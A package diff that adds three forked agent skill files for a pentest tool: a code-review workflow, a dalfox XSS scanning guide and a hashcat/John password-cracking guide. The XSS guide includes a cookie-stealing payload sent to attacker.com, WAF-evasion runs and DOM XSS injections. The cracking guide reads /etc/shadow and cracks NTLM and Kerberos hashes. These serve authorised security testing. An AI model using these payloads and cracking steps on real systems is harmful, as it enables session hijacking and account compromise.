@aegis-scan/skills 0.4.0 → 0.5.1

package/skills/offensive/airecon-fork/tools-code-review/SKILL.md

@@ -0,0 +1,71 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: code-review-headless
+description: Headless code review workflow for AIRecon Docker engine (CLI-only), focused on bug discovery, security risks, regressions, and test gaps.
+---
+
+# Code Review (Headless / Docker-Friendly)
+
+Use this workflow when reviewing source code, pull requests, or diffs for bugs and security issues.
+
+## Constraints
+
+- AIRecon engine runs in Docker + terminal tools.
+- Do not depend on GUI workflows (IDE visual diff, GUI SAST dashboards, browser-only inspectors).
+- Prefer reproducible CLI evidence: command output, file paths, line references.
+
+## Review Priorities
+
+1. Correctness bugs (logic, state, edge cases).
+2. Security flaws (injection, authz/authn, unsafe deserialization, path handling).
+3. Behavioral regressions introduced by new changes.
+4. Missing tests for high-risk paths.
+5. Performance/memory issues only when impactful.
+
+## Fast Triage Flow
+
+1. Scope the change:
+   - `git status --short`
+   - `git diff --stat`
+   - `git diff -- <file>`
+2. Locate critical surfaces:
+   - Input parsing, path normalization, report writing, auth/session, tool dispatch.
+3. Validate invariants:
+   - No empty target/path writes
+   - No unsafe path traversal
+   - No silently swallowed critical errors
+   - Deterministic behavior in retries/recovery
+4. Confirm with tests:
+   - Run the smallest relevant test subset first
+   - Then broader suite if core behavior changed
+
+## What to Report
+
+- Findings first, ordered by severity.
+- Include exact file + line references.
+- Include impact + failure mode + minimal fix.
+- Explicitly call out missing test coverage.
+- If no bug found, state residual risk and untested assumptions.
+
+## Useful CLI Patterns
+
+```bash
+# Find suspicious patterns quickly
+grep -Rsn "TODO\\|FIXME\\|except Exception\\|pass$\\|eval\\|exec\\|subprocess" airecon/
+
+# Focus on path/file handling
+grep -Rsn "resolve\\|relative_to\\|os.path.join\\|open(" airecon/proxy/
+
+# Verify reporting behavior
+pytest -q tests/proxy/test_reporting.py
+
+# Verify agent loop behavior
+pytest -q tests/proxy/agent/test_loop.py tests/proxy/agent/test_loop_extended.py
+```
+
+## Output Discipline
+
+- Every claim must be tied to concrete evidence from code or test output.
+- Avoid speculative findings without proof.
+- Prefer small, safe patches with matching tests.

package/skills/offensive/airecon-fork/tools-dalfox/SKILL.md

@@ -0,0 +1,189 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+# dalfox — XSS Scanner Usage Guide for AIRecon
+
+dalfox is a parameter analysis and XSS scanner. It is effective ONLY when pointed at URLs that
+already have reflected parameters confirmed through prior enumeration. Running dalfox against a
+root URL or a URL with no query parameters is the definition of wasted effort.
+
+---
+
+## MANDATORY PRE-CONDITIONS (All must be true before using dalfox)
+
+  [ ] You have collected URLs with parameters from: katana, waybackurls, gau, historical URL analysis.
+      Output should be in output/urls_all_deduped.txt or output/historical_urls.txt.
+  [ ] For single-URL mode: you have manually confirmed the parameter reflects user input in the response.
+      Test manually first: curl "http://target/search?q=CANARY123" — does CANARY123 appear in response?
+  [ ] Caido is running (caido-setup has been executed) so all dalfox traffic is captured.
+  [ ] You have a specific hypothesis: which parameter on which endpoint is suspected to be injectable.
+
+Running dalfox without confirmed reflected parameters = noise, not intelligence.
+
+---
+
+## What dalfox Does and Does Not Do
+
+  WHAT IT DOES:
+    - Injects XSS payloads into URL parameters and POST body fields
+    - Detects reflection and attempts to confirm browser-side execution
+    - Identifies DOM-based XSS sources and sinks via headless browser
+    - Tests blind XSS with a callback URL (interactsh integration)
+    - Supports WAF bypass payload mutation
+
+  WHAT IT DOES NOT DO:
+    - Understand application context (what the parameter is used for)
+    - Detect stored XSS without a second request to a rendered page
+    - Guarantee zero false positives — all "VULN" results require manual browser verification
+    - Replace manual analysis of JavaScript source code for DOM XSS sinks
+
+---
+
+## Command Patterns
+
+  PIPE MODE (process URL list from file — most common for recon):
+    cat output/xss_candidates.txt | dalfox pipe \
+      --proxy http://127.0.0.1:48080 \
+      -o output/dalfox_pipe_results.txt
+
+  Generate candidate list from historical URLs with gf first:
+    cat output/urls_all_deduped.txt | gf xss | sort -u > output/xss_candidates.txt
+    cat output/historical_urls.txt | gf xss | sort -u >> output/xss_candidates.txt
+    cat output/xss_candidates.txt | dalfox pipe --proxy http://127.0.0.1:48080 -o output/dalfox_results.txt
+
+  SINGLE URL MODE (after manual confirmation of reflection):
+    dalfox url "http://target.com/search?q=test" \
+      --proxy http://127.0.0.1:48080 \
+      -o output/dalfox_search_q.txt
+
+  WITH AUTHENTICATION (session cookie required):
+    dalfox url "http://target.com/profile?name=test" \
+      --cookie "session=<value>" \
+      --proxy http://127.0.0.1:48080 \
+      -o output/dalfox_profile.txt
+
+  POST BODY PARAMETER:
+    dalfox url "http://target.com/submit" \
+      -X POST \
+      --data "username=test&message=hello" \
+      --proxy http://127.0.0.1:48080 \
+      -o output/dalfox_post.txt
+
+  DOM XSS DISCOVERY (skip BAV — focus on DOM sinks only):
+    dalfox url "http://target.com/page?ref=test" \
+      --skip-bav \
+      --only-discovery \
+      --proxy http://127.0.0.1:48080
+
+  BLIND XSS (callback-based, survives stored/out-of-band contexts):
+    Requires interactsh-client for callback URL:
+      CALLBACK=$(interactsh-client -n 1 2>/dev/null | grep -o '[a-z0-9]*\.oast\.fun' | head -1)
+      dalfox url "http://target.com/feedback?msg=test" \
+        --blind "$CALLBACK" \
+        --proxy http://127.0.0.1:48080 \
+        -o output/dalfox_blind.txt
+    Then monitor: interactsh-client -n 1 -o output/interactsh_hits.txt
+
+  WAF BYPASS MODE:
+    dalfox url "http://target.com/search?q=test" \
+      --waf-evasion \
+      --proxy http://127.0.0.1:48080 \
+      -o output/dalfox_waf.txt
+
+---
+
+## Integration with Caido
+
+  Route ALL dalfox traffic through Caido to capture request/response pairs:
+    --proxy http://127.0.0.1:48080
+
+  After dalfox finishes, query Caido history to inspect which payloads triggered responses:
+    curl -sL -X POST http://127.0.0.1:48080/graphql \
+      -H "Content-Type: application/json" \
+      -H "Authorization: Bearer $TOKEN" \
+      -d '{"query":"{ requests(filter: {host: {eq: \"target.com\"}, method: {eq: \"GET\"}}) { edges { node { id method path response { statusCode length } } } } }"}'
+
+  Use Caido Replay to manually re-send a promising request with a specific payload:
+    1. Find the request ID from history query above
+    2. createReplaySession → startReplayTask with modified payload
+    3. Inspect response to confirm reflection context
+
+---
+
+## Result Interpretation
+
+  dalfox output levels:
+
+  [I] INFO — Informational: reflected content found, not yet confirmed as XSS
+  [W] WEAK — Potential XSS: payload reflected but execution not confirmed
+  [V] VULN — Confirmed XSS: payload executed in headless browser context
+
+  FOR EVERY [V] VULN RESULT:
+    STEP 1: Note the exact URL and payload dalfox used.
+    STEP 2: Manually reproduce with browser_action:
+              browser_action(action="goto", url="<the exact VULN url>")
+              browser_action(action="get_console_logs", tab_id="main")
+    STEP 3: Confirm execution context — what DOM element? What encoding was bypassed?
+    STEP 4: Upgrade PoC to impact-demonstrating payload:
+              fetch('https://attacker.com?c='+document.cookie) — session hijack
+              fetch('/api/admin', {method:'POST'}) — privilege chain
+    STEP 5: Document: URL, parameter, payload, context, impact. Call create_vulnerability_report.
+
+  FOR [W] WEAK RESULTS:
+    Do not report. Investigate manually: does the payload appear in the response body?
+    What context? HTML node, attribute, JS string, URL? Craft a context-specific payload manually.
+
+  FOR FALSE POSITIVES:
+    dalfox may flag benign reflections where input is HTML-encoded. Always verify:
+      curl "http://target/path?param=<svg onload=alert(1)>" | grep -i "svg\|onload\|alert"
+    If output is &lt;svg ... — it is safely encoded. Not a vulnerability.
+
+---
+
+## DOM XSS Manual Analysis Workflow
+
+  When dalfox --only-discovery flags a DOM XSS source:
+
+  STEP 1: Visit the page in the browser:
+    browser_action(action="goto", url="http://target.com/page")
+
+  STEP 2: Get page JavaScript source to find sinks:
+    browser_action(action="view_source", tab_id="main")
+    Look for: innerHTML, outerHTML, document.write, eval, setTimeout with string args,
+              location.hash, URLSearchParams, document.referrer flowing to a sink.
+
+  STEP 3: Instrument the page to trace data flow:
+    browser_action(action="execute_js", js_code="""
+      (function(){
+        const orig = Object.getOwnPropertyDescriptor(Element.prototype, 'innerHTML').set;
+        Object.defineProperty(Element.prototype, 'innerHTML', {
+          set: function(v) { if(v && v.includes('<')) console.log('[SINK innerHTML]', v.substring(0,100)); return orig.call(this, v); }
+        });
+      })()
+    """, tab_id="main")
+
+  STEP 4: Inject the suspected source (e.g., hash):
+    browser_action(action="goto", url="http://target.com/page#<img src=x onerror=alert(1)>")
+    browser_action(action="get_console_logs", tab_id="main")
+    Look for [SINK innerHTML] in console — confirms the DOM XSS path.
+
+---
+
+## Workflow Integration (Where dalfox Fits)
+
+  Phase 2 (Attack Surface Expansion — URL enumeration complete):
+    Run gf xss on collected URLs → dalfox pipe → capture in Caido → manually verify [V] results.
+
+  Phase 3 (Manual Testing — specific parameter identified):
+    dalfox single URL mode on confirmed-reflective parameter.
+    Always preceded by manual curl reflection check.
+
+  Phase 4 (Vulnerability Confirmation):
+    browser_action verification of [V] results.
+    Impact-demonstrating PoC crafting.
+    create_vulnerability_report only after manual browser confirmation.
+
+  NEVER:
+    Run dalfox against a URL with no query parameters.
+    Run dalfox against all live hosts blindly.
+    Report a [W] WEAK result without manual verification.
+    Skip browser_action verification — dalfox headless detection can false-positive.

package/skills/offensive/airecon-fork/tools-hashcat-john/SKILL.md

@@ -0,0 +1,258 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: hashcat-john
+description: Password cracking with hashcat and John the Ripper — hash identification, attack modes, rules, wordlists, specific hash types for Windows NTLM, Linux shadow, web hashes, and Kerberos tickets
+---
+
+# Hashcat & John the Ripper
+
+Password cracking = identify hash type → choose attack mode → use wordlist + rules → crack. hashcat = GPU-accelerated (faster). john = CPU-based (easier syntax, more built-in tools).
+
+**Install:**
+```
+sudo apt-get install -y hashcat john hash-identifier
+sudo apt-get install -y hashid
+# wordlists:
+sudo apt-get install -y wordlists
+ls /usr/share/wordlists/   # rockyou.txt.gz → gunzip it
+sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
+```
+
+---
+
+## Hash Identification
+
+    # hash-identifier:
+    hash-identifier '<hash_string>'
+
+    # hashid:
+    hashid '<hash>'
+    hashid -m '<hash>'    # -m = show hashcat mode number
+
+    # Identify by length and format:
+    # 32 chars hex → MD5 ($1) or NTLM
+    # 40 chars hex → SHA1
+    # 60 chars $2y$ → bcrypt
+    # 64 chars hex → SHA256
+    # 128 chars hex → SHA512
+    # $1$ → MD5crypt (Linux)
+    # $5$ → SHA256crypt
+    # $6$ → SHA512crypt
+    # $apr1$ → Apache MD5
+    # $y$ → yescrypt
+
+    # hashcat example hashes (reference):
+    # https://hashcat.net/wiki/doku.php?id=example_hashes
+
+---
+
+## Common Hash Modes (hashcat -m)
+
+    | Mode  | Hash Type                    |
+    |-------|------------------------------|
+    | 0     | MD5                          |
+    | 100   | SHA1                         |
+    | 1000  | NTLM (Windows)               |
+    | 1400  | SHA256                       |
+    | 1700  | SHA512                       |
+    | 1800  | SHA512crypt $6$ (Linux)      |
+    | 500   | MD5crypt $1$ (Linux)         |
+    | 3200  | bcrypt $2*$                  |
+    | 13100 | Kerberoast TGS               |
+    | 18200 | Kerberos AS-REP              |
+    | 5600  | NetNTLMv2                    |
+    | 5500  | NetNTLMv1                    |
+    | 2500  | WPA/WPA2 PMKID               |
+    | 13600 | WinZip (ZIP AES-256)         |
+    | 22921 | RSA/DSA/EC SSH private key   |
+    | 7100  | macOS PBKDF2-SHA512          |
+
+---
+
+## hashcat Attack Modes
+
+### Wordlist Attack (-a 0)
+
+    # Basic wordlist:
+    hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
+
+    # With rules (BEST — adds 10x coverage):
+    hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
+    hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule
+    hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/d3ad0ne.rule
+
+    # Multiple wordlists:
+    hashcat -m 1000 hash.txt wordlist1.txt wordlist2.txt
+
+### Brute Force (-a 3)
+
+    # Charset masks: ?l=lowercase, ?u=uppercase, ?d=digit, ?s=special, ?a=all
+    hashcat -m 1000 hash.txt -a 3 ?u?l?l?l?l?d?d    # Aaaaaa00 pattern
+    hashcat -m 1000 hash.txt -a 3 -i ?a?a?a?a?a?a    # Incremental 1-6 chars all charset
+    hashcat -m 1000 hash.txt -a 3 Password?d?d?d      # Password + 3 digits
+
+### Combination Attack (-a 1)
+
+    # Combine two wordlists:
+    hashcat -m 1000 hash.txt wordlist1.txt wordlist2.txt -a 1
+
+### Hybrid Attack (-a 6/7)
+
+    # Wordlist + mask:
+    hashcat -m 1000 hash.txt -a 6 /usr/share/wordlists/rockyou.txt ?d?d?d?d   # word + 4 digits
+    # Mask + wordlist:
+    hashcat -m 1000 hash.txt -a 7 ?d?d /usr/share/wordlists/rockyou.txt       # 2 digits + word
+
+---
+
+## Common Cracking Scenarios
+
+### Windows NTLM (from secretsdump, Responder)
+
+    hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt
+    hashcat -m 1000 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
+    # Hash format: username:RID:LM:NTLM:::
+    # Extract NTLM only: cut -d: -f4 secretsdump_output.txt > ntlm_only.txt
+
+### Linux Shadow (/etc/shadow)
+
+    # Extract hash:
+    sudo cat /etc/shadow | grep -v "!\|\*" > shadow_hashes.txt
+    # Format: $6$salt$hash (SHA512crypt)
+    hashcat -m 1800 shadow_hashes.txt /usr/share/wordlists/rockyou.txt
+
+    # Unshadow (combine /etc/passwd + /etc/shadow for john):
+    unshadow /etc/passwd /etc/shadow > combined.txt
+    john combined.txt --wordlist=/usr/share/wordlists/rockyou.txt
+
+### Kerberoast TGS Tickets
+
+    hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
+    hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
+
+### AS-REP Roasting
+
+    hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
+
+### NetNTLMv2 (from Responder)
+
+    hashcat -m 5600 netntlmv2.txt /usr/share/wordlists/rockyou.txt
+    hashcat -m 5600 netntlmv2.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
+
+### Web Application Hashes
+
+    # MD5: $0$, no prefix
+    hashcat -m 0 web_hashes.txt /usr/share/wordlists/rockyou.txt
+
+    # SHA256 (Django, etc.):
+    hashcat -m 1400 sha256_hashes.txt /usr/share/wordlists/rockyou.txt
+
+    # bcrypt (most web apps):
+    hashcat -m 3200 bcrypt_hashes.txt /usr/share/wordlists/rockyou.txt
+    # NOTE: bcrypt is slow — GPU helps but still slow; focus on weak passwords
+
+    # WordPress (phpass $P$):
+    hashcat -m 400 wp_hashes.txt /usr/share/wordlists/rockyou.txt
+
+### SSH Private Key
+
+    # Convert key to hash first:
+    ssh2john id_rsa > id_rsa.hash
+    john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
+    # OR:
+    hashcat -m 22921 id_rsa.hash /usr/share/wordlists/rockyou.txt
+
+### ZIP / Archive Password
+
+    zip2john archive.zip > zip.hash
+    john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
+
+    rar2john archive.rar > rar.hash
+    john rar.hash --wordlist=/usr/share/wordlists/rockyou.txt
+
+    7z2john archive.7z > 7z.hash
+    john 7z.hash --wordlist=/usr/share/wordlists/rockyou.txt
+
+---
+
+## John the Ripper
+
+    # Auto-detect hash format and crack:
+    john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
+
+    # Show cracked passwords:
+    john hash.txt --show
+
+    # Specific format:
+    john hash.txt --format=NT --wordlist=/usr/share/wordlists/rockyou.txt
+    john hash.txt --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt
+    john hash.txt --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt
+
+    # List all supported formats:
+    john --list=formats
+
+    # Rules:
+    john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --rules=All
+    john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --rules=Jumbo
+
+    # Incremental brute force:
+    john hash.txt --incremental=Digits       # digits only
+    john hash.txt --incremental=Lower        # lowercase only
+    john hash.txt --incremental=All          # all chars
+
+---
+
+## Wordlists & Rules
+
+    # Best wordlists:
+    /usr/share/wordlists/rockyou.txt          # 14M passwords (go-to)
+    /usr/share/seclists/Passwords/darkweb2017-top10000.txt
+    /usr/share/seclists/Passwords/probable-v2-top12000.txt
+
+    # Custom wordlist for target (CeWL):
+    sudo apt-get install -y cewl
+    cewl http://target.com -d 3 -m 5 -w custom_wordlist.txt  # Crawl depth 3, min 5 chars
+
+    # hashcat rules (apply to wordlist for mutations):
+    /usr/share/hashcat/rules/best64.rule     # 64 most effective rules
+    /usr/share/hashcat/rules/rockyou-30000.rule  # 30k rules
+    /usr/share/hashcat/rules/d3ad0ne.rule    # Popular community rules
+    /usr/share/hashcat/rules/T0XlC.rule
+
+---
+
+## hashcat Performance
+
+    # Show GPU info:
+    hashcat -I
+
+    # Benchmark specific mode:
+    hashcat -b -m 1000   # Benchmark NTLM
+
+    # Docker without GPU (CPU mode):
+    hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt --force
+    # --force required in Docker/VM without native GPU
+
+    # Status during run:
+    # Press S for status, P to pause, R to resume, Q to quit
+
+---
+
+## Pro Tips
+
+1. Always use `best64.rule` with rockyou — doubles coverage over plain wordlist for minimal cost
+2. NTLM is fastest to crack — 0 iterations, GPU can do billions/sec — prioritize these
+3. bcrypt is slowest — only crack with small, focused wordlist; common passwords first
+4. `cewl` generates target-specific wordlist from their website — high hit rate for internal pentest
+5. `hashid -m` gives hashcat mode directly — no manual lookup needed
+6. Kerberoast: crack BEFORE demanding better wordlists — service account passwords are often weak
+
+## Summary
+
+Cracking workflow:
+1. `hashid -m <hash>` → identify type and hashcat mode
+2. `hashcat -m <mode> hash.txt rockyou.txt` → baseline
+3. `hashcat -m <mode> hash.txt rockyou.txt -r best64.rule` → with mutations
+4. If fails: `hashcat -a 3 -m <mode> hash.txt ?a?a?a?a?a?a?a?a` → brute force up to 8 chars
+5. Kerberoast/NTLM: fast to crack → always attempt. bcrypt: expensive → targeted wordlist only.